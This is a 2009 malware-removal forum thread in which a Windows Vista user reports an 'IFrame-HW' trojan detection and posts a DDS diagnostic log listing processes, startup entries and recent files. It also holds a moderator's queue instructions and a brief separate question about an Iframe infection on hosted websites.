
Infected with IFrame-HW [Trj]

Q: Infected with IFrame-HW [Trj]

Avast antivirus is reporting that a number of files have been infected with a trojan called "IFrame-HW [Trj]". It seems to move around to different files. I use Windows Vista, and some of the infected files are in hidden folders which I can no longer seem to access. Also, when I tell Avast to move the files to its chest or to delete them, they just seem to come right back, sometimes immediately. I'm not sure what effect it is having on my PC, except Mozilla Firefox will no longer function on my PC; I can only browse the net with IE or Opera.
I have also tried using Cyberscrub to clear my free space after deleting infected files, but when I do so I get constant reports of the infection from Avast and Cyberscrub stops responding.
Any help will be greatly appreciated.
DDS (Ver_09-06-26.01) - NTFSx86
Run by olusanya at 16:37:47.03 on Thu 07/09/2009
Internet Explorer: 8.0.6001.18783
Microsoft® Windows Vista™ Home Premium 6.0.6001.1.1252.1.1033.18.2814.1528 [GMT -4:00]

SP: Spybot - Search and Destroy *disabled* (Updated) {ED588FAF-1B8F-43B4-ACA8-8E3C85DADBE9}
SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}

============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\rundll32.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\Windows\system32\WLANExt.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\a-squared Anti-Malware\a2service.exe
C:\Windows\system32\ASTSRV.EXE
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\system32\svchost.exe -k bthsvcs
C:\Windows\system32\CTsvcCDA.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\Program Files\Common Files\Nero\Nero BackItUp 4\NBService.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
C:\Program Files\SMINST\BLService.exe
C:\Program Files\CyberLink\Shared files\RichVideo.exe
C:\Program Files\Photodex\ProShowProducer\ScsiAccess.exe
C:\Program Files\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe
C:\Program Files\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\DRIVERS\xaudio.exe
C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\WINDOWS\System32\rundll32.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\HP\QuickPlay\QPService.exe
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe
C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
C:\Program Files\Adobe\Acrobat 8.0\Acrobat\acrotray.exe
C:\Program Files\Alwil Software\Avast4\ashDisp.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Internet Download Manager\IDMan.exe
C:\WINDOWS\ehome\ehtray.exe
C:\Program Files\CyberScrub Privacy Suite\CSRiskMon.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\Common Files\MySoftware\Newsflsh.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\Stardock\ObjectDock\ObjectDock.exe
C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files\Hewlett-Packard\HP wireless Assistant\WiFiMsg.EXE
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe
C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
C:\Program Files\Hewlett-Packard\Shared\HpqToaster.exe
C:\Program Files\Internet Download Manager\IEMonitor.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Program Files\Opera\opera.exe
C:\Windows\explorer.exe
C:\Users\olusanya\Desktop\dds.scr
C:\Windows\system32\wbem\wmiprvse.exe

============== Pseudo HJT Report ===============

uStart Page = hxxp://www.gmail.com/
uDefault_Page_URL = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_us&c=91&bd=Pavilion&pf=cnnb
mStart Page = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_us&c=91&bd=Pavilion&pf=cnnb
mDefault_Page_URL = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_us&c=91&bd=Pavilion&pf=cnnb
uInternet Settings,ProxyOverride = *.local
BHO: IDMIEHlprObj Class: {0055c089-8582-441b-a0bf-17b458c2a3a8} - c:\program files\internet download manager\IDMIECC.dll
BHO: {02478D38-C3F9-4efb-9B51-7695ECA05670} - No File
BHO: IeMonitorBho Class: {bf00e119-21a3-4fd1-b178-3b8537e75c92} - c:\program files\megaupload\mega manager\MegaIEMn.dll
TB: Microsoft Live Search Toolbar: {1e61ed7c-7cb8-49d6-b9e9-ab4c880c8414} - c:\program files\msn\toolbar\3.0.0541.0\msneshellx.dll
TB: Adobe PDF: {47833539-d0c5-4125-9fa8-0819e2eaac93} - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll
TB: Contribute Toolbar: {517bdde4-e3a7-4570-b21e-2b52b6139fc7} - c:\program files\adobe\/Adobe Contribute CS3/contributeieplugin.dll
TB: Snagit: {8ff5e183-abde-46eb-b09e-d2aab95cabe3} - c:\program files\techsmith\snagit 9\SnagitIEAddin.dll
TB: Ask.com Toolbar: {d4027c7f-154a-4066-a1ad-4243d8127440} - c:\program files\ask.com\supertoolbar\GenericAskToolbar.dll
TB: {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} - No File
TB: {8FF5E180-ABDE-46EB-B09E-D2AAB95CABE3} - No File
TB: {32099AAC-C132-4136-9E9A-4E364A424E17} - No File
EB: Adobe PDF: {182ec0be-5110-49c8-a062-beb1d02a220b} - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll
uRun: [IDMan] c:\program files\internet download manager\IDMan.exe /onboot
uRun: [ehTray.exe] c:\windows\ehome\ehTray.exe
uRun: [Privacy Suite RiskMonitor] c:\program files\cyberscrub privacy suite\CSRiskMon.exe
uRun: [Sidebar] c:\program files\windows sidebar\sidebar.exe /autoRun
uRun: [CTSyncU.exe] "c:\program files\creative\sync manager unicode\CTSyncU.exe"
mRun: [NvCplDaemon] RUNDLL32.EXE c:\windows\system32\NvCpl.dll,NvStartup
mRun: [NvMediaCenter] RUNDLL32.EXE c:\windows\system32\NvMcTray.dll,NvTaskbarInit
mRun: [SynTPEnh] c:\program files\synaptics\syntp\SynTPEnh.exe
mRun: [QPService] "c:\program files\hp\quickplay\QPService.exe"
mRun: [UpdateLBPShortCut] "c:\program files\cyberlink\labelprint\muitransfer\muistartmenu.exe" "c:\program files\cyberlink\labelprint" updatewithcreateonce "software\cyberlink\labelprint\2.5"
mRun: [UpdatePSTShortCut] "c:\program files\cyberlink\dvd suite\muitransfer\muistartmenu.exe" "c:\program files\cyberlink\dvd suite" updatewithcreateonce "software\cyberlink\PowerStarter"
mRun: [UCam_Menu] "c:\program files\cyberlink\youcam\muitransfer\muistartmenu.exe" "c:\program files\cyberlink\youcam" update "software\cyberlink\youcam\2.0"
mRun: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
mRun: [QlbCtrl.exe] c:\program files\hewlett-packard\hp quick launch buttons\QlbCtrl.exe /Start
mRun: [Adobe Reader Speed Launcher] "c:\program files\adobe\reader 9.0\reader\Reader_sl.exe"
mRun: [UpdateP2GoShortCut] "c:\program files\cyberlink\power2go\muitransfer\muistartmenu.exe" "c:\program files\cyberlink\power2go" updatewithcreateonce "software\cyberlink\power2go\6.0"
mRun: [UpdatePDIRShortCut] "c:\program files\cyberlink\powerdirector\muitransfer\muistartmenu.exe" "c:\program files\cyberlink\powerdirector" updatewithcreateonce "software\cyberlink\powerdirector\7.0"
mRun: [HP Health Check Scheduler] c:\program files\hewlett-packard\hp health check\HPHC_Scheduler.exe
mRun: [hpWirelessAssistant] c:\program files\hewlett-packard\hp wireless assistant\HPWAMain.exe
mRun: [Acrobat Assistant 8.0] "c:\program files\adobe\acrobat 8.0\acrobat\Acrotray.exe"
mRun: [<NO NAME>]
mRun: [Adobe_ID0EYTHM] c:\progra~1\common~1\adobe\adobev~1\server\bin\VERSIO~2.EXE
mRun: [avast!] c:\progra~1\alwils~1\avast4\ashDisp.exe
mRun: [GrooveMonitor] "c:\program files\microsoft office\office12\GrooveMonitor.exe"
mRun: [FontExpertType1Loader] c:\program files\fontexpert\Type1Loader.exe
mRun: [a-squared] "c:\program files\a-squared anti-malware\a2guard.exe"
dRun: [<NO NAME>] c:\windows\temp\uayjhdq.exe
dRun: [hsf7husjnfg98gi498aejhiugjkdg4] c:\windows\temp\uayjhdq.exe
StartupFolder: c:\users\olusanya\appdata\roaming\microsoft\windows\start menu\programs\startup\ap
StartupFolder: c:\users\olusanya\appdata\roaming\micros~1\windows\startm~1\programs\startup\stardo~1.lnk - c:\program files\stardock\objectdock\ObjectDock.exe
StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\newsfl~1.lnk - c:\program files\common files\mysoftware\Newsflsh.exe
mPolicies-system: EnableLUA = 0 (0x0)
mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
IE: Add to AMV Converter... - c:\program files\mp3 player utilities 4.19\amvconverter\grab.html
IE: Append to existing PDF - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert link target to Adobe PDF - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert link target to existing PDF - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert selected links to Adobe PDF - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert selected links to existing PDF - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Convert selection to Adobe PDF - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert selection to existing PDF - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert to Adobe PDF - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Download all links with IDM - c:\program files\internet download manager\IEGetAll.htm
IE: Download FLV video content with IDM - c:\program files\internet download manager\IEGetVL.htm
IE: Download with IDM - c:\program files\internet download manager\IEExt.htm
IE: E&xport to Microsoft Excel - c:\progra~1\micros~3\office12\EXCEL.EXE/3000
IE: Sothink SWF Catcher - c:\program files\common files\sourcetec\swf catcher\InternetExplorer.htm
IE: {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - c:\program files\common files\sourcetec\swf catcher\InternetExplorer.htm
IE: {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBC} - c:\progra~1\java\jre16~1.0_0\bin\ssv.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - c:\progra~1\micros~3\office12\ONBttnIE.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503} - c:\progra~1\micros~3\office12\REFIEBAR.DLL
IE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} - c:\program files\spybot - search & destroy\SDHelper.dll
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - c:\progra~1\micros~3\office12\GR99D3~1.DLL
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\progra~1\common~1\skype\SKYPE4~1.DLL
SEH: Groove GFS Stub Execution Hook: {b5a7f190-dda6-4420-b3ba-52453494e6cd} - c:\progra~1\micros~3\office12\GRA8E1~1.DLL
SEH: DVDIdleShell Class: {93994de8-8239-4655-b1d1-5f4e91300429} - c:\program files\dvdidle pro\DVDShell.dll

============= SERVICES / DRIVERS ===============

R1 aswSP;avast! Self Protection;c:\windows\system32\drivers\aswSP.sys [2009-6-7 114768]
R1 StarPortLite;StarPort Storage Controller (Lite);c:\windows\system32\drivers\StarPortLite.sys [2009-6-19 95592]
R2 ASTSRV;Nalpeiron Licensing Service;c:\windows\system32\ASTSRV.EXE [2009-6-10 57344]
R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [2009-6-7 20560]
R2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys [2009-6-7 51792]
R2 Nero BackItUp Scheduler 4.0;Nero BackItUp Scheduler 4.0;c:\program files\common files\nero\nero backitup 4\NBService.exe [2009-5-15 935208]
R2 Recovery Service for Windows;Recovery Service for Windows;c:\program files\sminst\BLService.exe [2008-10-28 365952]
R2 SBSDWSCService;SBSD Security Center Service;c:\program files\spybot - search & destroy\SDWinSec.exe [2009-7-9 1153368]
R2 SentinelKeysServer;Sentinel Keys Server;c:\program files\common files\safenet sentinel\sentinel keys server\sntlkeyssrvr.exe [2007-4-27 316992]
R3 Com4QLBEx;Com4QLBEx;c:\program files\hewlett-packard\hp quick launch buttons\Com4QLBEx.exe [2008-10-28 193840]
R3 NVHDA;Service for NVIDIA High Definition Audio Driver;c:\windows\system32\drivers\nvhda32v.sys [2008-5-9 43040]
S2 Norton Internet Security;Norton Internet Security;"c:\program files\norton internet security\engine\16.0.0.125\ccsvchst.exe" /s "norton internet security" /m "c:\program files\norton internet security\engine\16.0.0.125\dimaster.dll" /prefetch:1 --> c:\program files\norton internet security\engine\16.0.0.125\ccSvcHst.exe [?]

============== File Associations ===============

regfile="regedit.exe" "%1"

=============== Created Last 30 ================

2009-07-09 15:00 <DIR> --d----- c:\program files\Megaupload
2009-07-09 14:41 <DIR> --d----- c:\programdata\Spybot - Search & Destroy
2009-07-09 14:41 <DIR> --d----- c:\program files\Spybot - Search & Destroy
2009-07-09 14:41 <DIR> --d----- c:\progra~2\Spybot - Search & Destroy
2009-07-09 10:22 45,056 -------- c:\windows\system32\CTSVCCTL.EXE
2009-07-09 10:22 64,000 -------- c:\windows\system32\CTSVCCDA.EXE
2009-07-09 10:22 <DIR> --d----- c:\program files\common files\Creative
2009-07-09 10:22 <DIR> --d-h--- c:\program files\Creative Installation Information
2009-07-09 10:21 <DIR> --d----- c:\program files\Creative
2009-07-09 07:58 <DIR> --d----- c:\program files\Yahoo!
2009-07-09 07:58 <DIR> --d----- c:\program files\CCleaner
2009-07-09 00:55 <DIR> --d----- c:\program files\Your Uninstaller 2008
2009-07-09 00:53 <DIR> --d----- c:\windows\Profiles
2009-07-08 17:56 67 a------- c:\windows\DVDIdlePro.INI
2009-07-08 17:43 <DIR> --d----- c:\program files\Art Explosion
2009-07-08 17:10 <DIR> --d----- c:\programdata\BVRP Software
2009-07-08 17:10 <DIR> --d----- c:\program files\Avanquest update
2009-07-08 17:07 96 a------- c:\windows\bizpub32.INI
2009-07-08 17:02 565,760 a------- c:\windows\system32\msvcp50.DLL
2009-07-08 17:02 348,160 a------- c:\windows\system32\MFC30.DLL
2009-07-08 17:02 133,904 a------- c:\windows\system32\MFCANS32.DLL
2009-07-08 17:02 27,025 a------- c:\windows\system32\OLE2.REG
2009-07-08 17:02 5,632 a------- c:\windows\system32\MFCUIA32.DLL
2009-07-08 17:02 <DIR> --d----- c:\program files\common files\MySoftware
2009-07-08 17:02 <DIR> --d----- c:\program files\MySoftware
2009-07-08 14:43 2,560 a------- C:\DVDSample.bmk
2009-07-08 14:37 <DIR> --d----- C:\ApolloOutput
2009-07-08 14:36 <DIR> --d----- c:\program files\No1 DVD Ripper
2009-07-08 14:08 <DIR> --d----- c:\program files\Ask.com
2009-07-07 22:02 <DIR> --d----- c:\program files\DVDFab 6
2009-07-07 19:40 <DIR> --d----- c:\program files\a-squared Anti-Malware
2009-07-06 21:02 <DIR> --d----- c:\users\olusanya\appdata\roaming\Flock
2009-07-06 21:01 <DIR> --d----- c:\program files\Flock
2009-07-06 19:24 2 a------- c:\windows\0101120101464849.dat
2009-07-06 19:24 2 a------- c:\windows\010112010146118114.dat
2009-07-06 14:24 <DIR> --d----- c:\programdata\Winferno
2009-07-06 14:19 <DIR> --d----- c:\users\olusanya\appdata\roaming\WeatherBug
2009-07-06 12:22 <DIR> --d----- c:\program files\AAALOGO2008
2009-07-06 12:22 <DIR> --dsh--- c:\windows\system32\%APPDATA%
2009-07-06 12:17 <DIR> --d----- c:\users\olusanya\appdata\roaming\LogoMaker
2009-07-06 12:15 <DIR> --d----- c:\program files\Studio V5
2009-07-05 22:07 56 a---h--- c:\windows\system32\ezsidmv.dat
2009-07-03 21:58 <DIR> --d----- c:\users\olusanya\appdata\roaming\mojosoft
2009-07-03 21:58 <DIR> --d----- c:\program files\MOJOSOFT
2009-07-03 21:48 <DIR> --d----- c:\program files\CAM Development
2009-07-01 16:33 <DIR> --d----- c:\program files\common files\PX Storage Engine
2009-07-01 13:39 <DIR> --d----- C:\Course Technology
2009-06-30 14:52 <DIR> --d----- c:\program files\MediaMonkey
2009-06-28 18:45 69 a------- c:\windows\NeroDigital.ini
2009-06-28 16:06 67 a------- c:\windows\AoADVDRipper.INI
2009-06-27 19:52 72 a------- c:\windows\MediaManager.INI
2009-06-27 19:44 <DIR> --d----- c:\program files\MP3 Player Utilities 4.19
2009-06-26 16:49 <DIR> --d----- c:\program files\common files\Autodesk Shared
2009-06-26 10:30 <DIR> --d----- c:\program files\common files\Alias Shared
2009-06-26 10:27 3,734,536 a------- c:\windows\system32\d3dx9_36.dll
2009-06-26 10:24 <DIR> --d----- C:\FLEXLM
2009-06-25 23:25 16 a------- c:\windows\popcinfo.dat
2009-06-25 22:38 <DIR> --d----- c:\program files\Side Effects Software
2009-06-25 19:03 <DIR> --d----- c:\program files\common files\DAZ
2009-06-24 19:47 <DIR> --d----- c:\users\olusanya\appdata\roaming\CyberScrub
2009-06-24 19:46 84 a------- c:\windows\csact.ini
2009-06-24 19:46 <DIR> --d----- c:\program files\CyberScrub Privacy Suite
2009-06-24 18:28 <DIR> --d----- c:\users\olusanya\appdata\roaming\Queue Manager
2009-06-24 18:25 <DIR> --d----- c:\users\olusanya\appdata\roaming\Poser Pro
2009-06-24 18:07 <DIR> --d----- c:\program files\Smith Micro
2009-06-24 17:55 741,376 a------- c:\windows\iun6002ev.exe
2009-06-24 17:55 <DIR> --d----- c:\program files\Bejeweled 2 Deluxe
2009-06-24 11:15 <DIR> --d----- c:\program files\SafeNet Sentinel
2009-06-24 11:15 <DIR> --d----- c:\program files\common files\SafeNet Sentinel
2009-06-24 11:11 <DIR> --d----- c:\program files\NewTek
2009-06-24 11:11 <DIR> --d----- c:\users\olusanya\.bitrock
2009-06-22 20:11 <DIR> --d----- c:\users\olusanya\appdata\roaming\MixMeister Technology
2009-06-22 10:35 <DIR> --d--r-- c:\program files\Skype
2009-06-22 10:35 <DIR> --d----- c:\programdata\Skype
2009-06-19 21:34 <DIR> --d----- c:\program files\DVDIdle Pro
2009-06-19 20:10 51 a------- c:\windows\StarPort.INI
2009-06-19 20:04 95,592 a------- c:\windows\system32\drivers\StarPortLite.sys
2009-06-19 19:33 <DIR> --d----- c:\program files\DAEMON Tools Lite
2009-06-19 10:27 <DIR> --d----- c:\program files\Pegasus Media Software
2009-06-19 10:22 <DIR> --d----- C:\DVDMovie
2009-06-19 10:13 <DIR> --d----- c:\program files\Xvid
2009-06-19 10:13 <DIR> --d----- c:\program files\AoA DVD Ripper
2009-06-19 09:25 <DIR> --d----- c:\programdata\DVD Shrink
2009-06-18 20:12 <DIR> --d----- c:\users\olusanya\appdata\roaming\WildTangent
2009-06-18 15:45 87,608 a------- c:\users\olusanya\appdata\roaming\inst.exe
2009-06-18 15:45 47,360 a------- c:\windows\system32\drivers\pcouffin.sys
2009-06-18 15:45 47,360 a------- c:\users\olusanya\appdata\roaming\pcouffin.sys
2009-06-18 15:45 217,127 a------- c:\windows\system32\drv43260.dll
2009-06-18 15:45 208,935 a------- c:\windows\system32\drv33260.dll
2009-06-18 15:45 176,165 a------- c:\windows\system32\drv23260.dll
2009-06-18 15:45 102,439 a------- c:\windows\system32\sipr3260.dll
2009-06-18 15:45 65,602 a------- c:\windows\system32\cook3260.dll
2009-06-18 15:45 1,184,984 a------- c:\windows\system32\wvc1dmod.dll
2009-06-18 15:45 626,688 a------- c:\windows\system32\vp7vfw.dll
2009-06-18 15:45 <DIR> --d----- c:\program files\VSO
2009-06-18 14:30 <DIR> --d----- c:\programdata\LightScribe
2009-06-18 14:30 <DIR> --d----- c:\progra~2\LightScribe
2009-06-18 14:17 4,767 a------- c:\windows\Irremote.ini
2009-06-18 13:59 <DIR> --d----- c:\program files\Nero
2009-06-18 13:58 <DIR> --d----- c:\programdata\Nero
2009-06-18 13:58 <DIR> --d----- c:\progra~2\Nero
2009-06-18 13:57 1,315,328 a------- c:\windows\system32\ole32.dll
2009-06-18 13:37 <DIR> --d----- c:\users\olusanya\appdata\roaming\Final Draft
2009-06-18 13:35 <DIR> --d----- c:\programdata\Final Draft
2009-06-18 13:35 <DIR> --d----- c:\progra~2\Final Draft
2009-06-18 13:35 <DIR> --d----- c:\program files\Final Draft Tagger
2009-06-18 13:35 <DIR> --d----- c:\program files\Final Draft 7
2009-06-18 13:33 <DIR> --d----- c:\program files\common files\Wise Installation Wizard
2009-06-16 23:08 593,920 -------- c:\windows\system32\MJ12.exe
2009-06-16 19:10 <DIR> --d----- c:\programdata\DAEMON Tools Lite
2009-06-16 19:10 <DIR> --d----- c:\progra~2\DAEMON Tools Lite
2009-06-16 19:10 <DIR> --d----- c:\program files\DAEMON Tools Toolbar
2009-06-16 19:09 <DIR> --d----- c:\users\olusanya\appdata\roaming\DAEMON Tools Lite
2009-06-16 14:54 <DIR> --d----- c:\program files\MagicISO
2009-06-16 14:41 <DIR> --d----- c:\programdata\Magix
2009-06-16 14:41 <DIR> --d----- c:\progra~2\Magix
2009-06-16 14:40 <DIR> --d----- c:\users\olusanya\appdata\roaming\MAGIX
2009-06-16 14:40 <DIR> --d----- c:\programdata\Xara
2009-06-16 14:40 <DIR> --d----- c:\program files\Xara
2009-06-16 14:40 <DIR> --d----- c:\progra~2\Xara
2009-06-15 16:12 <DIR> --d----- c:\users\olusanya\appdata\roaming\Ableton
2009-06-15 16:12 <DIR> --d----- c:\programdata\Ableton
2009-06-15 16:12 <DIR> --d----- c:\progra~2\Ableton
2009-06-15 16:04 <DIR> --d----- c:\program files\VideoConverterPortable
2009-06-15 13:43 <DIR> --d----- c:\program files\Photodex Presenter
2009-06-15 13:42 <DIR> --d----- c:\program files\Photodex
2009-06-15 13:41 <DIR> --d----- c:\users\olusanya\appdata\roaming\Photodex
2009-06-15 09:25 368,640 a------- c:\windows\system32\rewire.dll
2009-06-15 09:25 <DIR> --d----- c:\program files\VstPlugins
2009-06-15 09:25 1,294,336 a------- c:\windows\system32\vorbis.acm
2009-06-15 09:24 <DIR> --d----- c:\program files\Image-Line
2009-06-13 14:45 <DIR> -cd-h--- c:\programdata\{7D4B3D1D-104E-4507-9123-568BC721B7E2}
2009-06-13 14:45 <DIR> -cd-h--- c:\progra~2\{7D4B3D1D-104E-4507-9123-568BC721B7E2}
2009-06-13 14:44 <DIR> --d----- c:\programdata\Transparent
2009-06-13 14:44 <DIR> --d----- c:\program files\Transparent
2009-06-13 14:44 <DIR> --d----- c:\progra~2\Transparent
2009-06-12 20:14 <DIR> --d----- c:\program files\Xilisoft
2009-06-12 16:42 <DIR> --d----- c:\program files\MP3TagEditor
2009-06-12 16:09 <DIR> --d----- c:\program files\Mp3tag
2009-06-12 16:08 <DIR> --d----- c:\programdata\Apple Computer
2009-06-12 16:04 <DIR> --d----- c:\programdata\WindowsSearch
2009-06-12 10:58 <DIR> --d----- c:\program files\ImTOO
2009-06-10 20:17 76 a------- c:\windows\system32\w3url.dll
2009-06-10 20:17 585,728 -------- c:\windows\system32\AReadyLB.dll
2009-06-10 20:17 362,496 -------- c:\windows\system32\MC13.exe
2009-06-10 20:17 229,376 -------- c:\windows\system32\AudDevicePlugin.dll
2009-06-10 20:17 183,129 -------- c:\windows\system32\AM Install1.INF
2009-06-10 20:17 73,728 -------- c:\windows\system32\BBInstaller.exe
2009-06-10 20:17 <DIR> --d----- c:\program files\J River
2009-06-10 20:17 <DIR> --d----- c:\users\olusanya\appdata\roaming\J River
2009-06-10 14:34 335,872 a------- c:\windows\system32\m4atag.dll
2009-06-10 14:34 <DIR> --d----- c:\program files\mp3Tag Pro 6
2009-06-10 11:34 57,344 a------- c:\windows\system32\ASTSRV.EXE
2009-06-10 10:40 <DIR> --d----- c:\programdata\TechSmith
2009-06-09 18:09 <DIR> --d----- c:\users\olusanya\appdata\roaming\Proxima Software

==================== Find3M ====================

2009-07-09 15:12 28,124 a------- c:\programdata\nvModes.dat
2009-07-09 15:12 28,124 a------- c:\progra~2\nvModes.dat
2009-07-08 13:27 5,642 a--sh--- c:\programdata\KGyGaAvL.sys
2009-07-08 13:27 5,642 a--sh--- c:\progra~2\KGyGaAvL.sys
2009-06-27 19:44 86,016 a------- c:\windows\inf\infstrng.dat
2009-06-27 19:44 86,016 a------- c:\windows\inf\infstor.dat
2009-06-27 19:44 51,200 a------- c:\windows\inf\infpub.dat
2009-06-19 20:05 721,904 a------- c:\windows\system32\drivers\sptd.sys
2009-06-09 14:30 8 ---shr-- c:\programdata\5E18453619.sys
2009-06-09 14:30 8 ---shr-- c:\progra~2\5E18453619.sys
2009-06-08 09:20 2,004 a------- c:\windows\registration\e10f24f0-652e-11dd-ad8b-0800200c9a66.dll
2009-06-06 18:46 0 a---h--- c:\windows\system32\drivers\Msft_User_WpdMtpDr_01_00_00.Wdf
2009-05-09 01:50 915,456 a------- c:\windows\system32\wininet.dll
2009-05-09 01:34 71,680 a------- c:\windows\system32\iesetup.dll
2009-04-30 08:37 293,376 a------- c:\windows\system32\psisdecd.dll
2009-04-30 08:37 428,544 a------- c:\windows\system32\EncDec.dll
2009-04-23 08:43 784,896 a------- c:\windows\system32\rpcrt4.dll
2009-04-23 08:42 636,928 a------- c:\windows\system32\localspl.dll
2009-04-21 07:55 2,033,152 a------- c:\windows\system32\win32k.sys
2008-10-28 08:53 665,600 a------- c:\windows\inf\drvindex.dat
2008-01-20 22:43 174 a--sh--- c:\program files\desktop.ini
2006-11-02 08:42 287,440 a------- c:\windows\inf\perflib\0409\perfi.dat
2006-11-02 08:42 287,440 a------- c:\windows\inf\perflib\0409\perfh.dat
2006-11-02 08:42 30,674 a------- c:\windows\inf\perflib\0409\perfd.dat
2006-11-02 08:42 30,674 a------- c:\windows\inf\perflib\0409\perfc.dat
2006-11-02 05:20 287,440 a------- c:\windows\inf\perflib\0000\perfi.dat
2006-11-02 05:20 287,440 a------- c:\windows\inf\perflib\0000\perfh.dat
2006-11-02 05:20 30,674 a------- c:\windows\inf\perflib\0000\perfd.dat
2006-11-02 05:20 30,674 a------- c:\windows\inf\perflib\0000\perfc.dat

============= FINISH: 16:38:21.83 ===============


A: Infected with IFrame-HW [Trj]

Pardon me... I left out the fact that it also seems to have disabled the protective mode of IE, leaving it vulnerable.

Hello nu2cpu,

We ask that once you have posted your log and are waiting, please DO NOT "bump" your thread or make further replies until it has been responded to by a member of the HJT Team. The reason we ask this or do not respond to your requests is because that would remove you from the active queue that Techs and Staff have access to. The malware staff checks the forum for postings that have 0 replies as this makes it easier for them to identify those who have not been helped. If you post another response, there will be 1 reply. A team member, looking for a new log to work may assume another HJT Team member is already assisting you and not open the thread to respond.

That is why I have made an edit to your last post, instead of a reply. Please do not multiple post here, as that only pushes you further down the queue and causes confusion to the staff.

Please be patient. It may take a while to get a response but your log will be reviewed and answered as soon as possible.

Thank you for understanding.

Regards,
The weatherman (Moderator)

Q: Iframe.inf infected - yes or no?

I already ran ComboFix before I found the preparation guide saying not to unless instructed - oops.

Iframe.inf infected my sites at Hostgator which they cleaned up overnight. I'm impressed.

Hostgator tech suggested scanning local system using multiple scanners for better results. I use Avast Internet Security and it reported no problems.

